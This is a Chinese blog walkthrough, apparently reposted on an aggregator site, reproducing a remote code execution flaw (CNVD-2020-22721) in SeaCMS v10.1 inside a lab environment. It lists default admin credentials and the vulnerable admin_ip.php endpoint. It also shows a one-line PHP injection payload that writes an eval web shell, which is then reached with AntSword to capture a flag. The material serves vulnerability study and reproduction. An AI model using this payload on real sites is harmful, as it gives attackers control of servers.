漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

这篇具有很好参考价值的文章主要介绍了漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)

漏洞信息

  • seacms_v10.1有效
  • cnvd-2020-22721
  • 命令执行漏洞

描述

海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台路径:/manager 后台密码:admin:admin

前提

  • volfucs靶场复现

  • 可以进入后台

复现过程

登录进入首页

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

按照如图顺序访问,点击确认时抓包

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

修改内容

v=0&ip=127.0.0.1";eval($_POST[999]);//

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

网页回显正常没有报错

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

尝试蚁剑连接

ip安全设置选项位置为admin_ip.php

访问也正常

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

尝试蚁剑连接该位置

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维

成功获取flag

漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721),漏洞复现,网络安全,web安全,安全,安全威胁分析,系统安全,运维文章来源地址https://www.toymoban.com/news/detail-718483.html

到了这里,关于漏洞复现-SeaCMS_v10.1_远程命令执行(CNVD-2020-22721)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CVE-2021-22205 GitLab 远程命令执行漏洞复现

    目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称 GITLAB 远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    浏览(29)
  • xxl-job远程命令执行漏洞复现

    XXL-JOB是一个分布式任务调度平台,其核心设计目标是开发迅速、学习简单、轻量级、易扩展。现已开放源代码并接入多家公司线上产品线,开箱即用。XXL-JOB分为admin和executor两端,前者为后台管理页面,后者是任务执行的客户端。executor默认没有配置认证,未授权的攻击者可

    2024年02月11日
    浏览(28)
  • 【漏洞复现】厦门才茂通信网关formping远程命令执行漏洞

    厦门才茂通信网关formping存在远程命令执行漏洞,攻击者可通过特定payload对目标服务器发起攻击,造成不可估量的影响。 请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所

    2024年02月15日
    浏览(52)
  • 亿赛通电子文档安全管理系统远程命令执行漏洞复现

    此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 亿赛通电子文档安全管理系统(简称:CDG)是一款电子文档安全加密软件,该系统利用驱动层透明加密技术,通过对电子文档的加密保护,防止内部员工泄密和外部人员非法窃取企业核心重要数据资产,对电子文档进

    2024年01月21日
    浏览(35)
  • HVV爆火漏洞:最新 WPS RCE (远程命令执行) 复现

    最近HVV爆出的很火的WPS命令执行漏洞,其实并不是0DAY,早在2019年就出现了,只不过最近EXP才公开。接下来我们来复现一遍。 WPS Office 2023 个人版 11.1.0.15120 WPS Office 2019 企业版 11.8.2.12085 wps版本: WPS V11.1.0.12300 靶机: windows 10 攻击机: ubuntu 20.04     IP:192.168.2.103 WPS 内置了一

    2024年02月11日
    浏览(40)
  • Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273)

    一、漏洞说明 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,包含Commons、Gemfire、JPA、JDBC、MongoDB等模块。此漏洞产生于Spring Data Commons组件,该组件为提供共享的基础框架,适合各个子项目使用,支持跨数据库持久化。 Spring Data Commons组件中存在远程代码执行

    2024年02月09日
    浏览(33)
  • 【IP-guard WebServer 远程命令执行漏洞复现(0day)】

    IP-guard是由溢信科技股份有限公司开发的一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。 IP-guard Webserver远程命令执行漏洞(RCE)的问题,是因为旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个

    2024年02月05日
    浏览(27)
  • Apache Struts2 S2-045远程命令执行漏洞(CVE-2017-5638)复现

    Apache Struts2是Apache项目下的一个web 框架,帮助Java开发者利用J2EE来开发Web相关应用。 Apache Struts2的Jakarta Multipart parser插件存在远程代码执行漏洞,攻击者可以在使用该插件上传文件时,修改HTTP请求头中的Content-Type值来触发该漏洞,导致远程执行代码。 Struts 2.3.5 – Struts 2.3.3

    2024年02月15日
    浏览(28)
  • 思福迪Logbase运维安全管理系统test_qrcode_b接口远程命令执行漏洞漏洞复现 [附POC]

    免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章

    2024年01月17日
    浏览(35)
  • 漏洞复现 CVE-2023-0297( pyload远程代码执行漏洞 )

    在 addcrypted2() 函数中,对传入的参数 jk 解析后用 eval_js() 作为 JS 语句执行。 利用 JS 中 pyimport 导入 OS 包,执行系统命令(文件操作,进程管理),还可以利用 os.system() 执行 shell 命令。 构建 payload 过程比较简单,只要传入所需的 package, crypted, jk, passwords 四个参数即可,这里

    2024年02月08日
    浏览(27)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包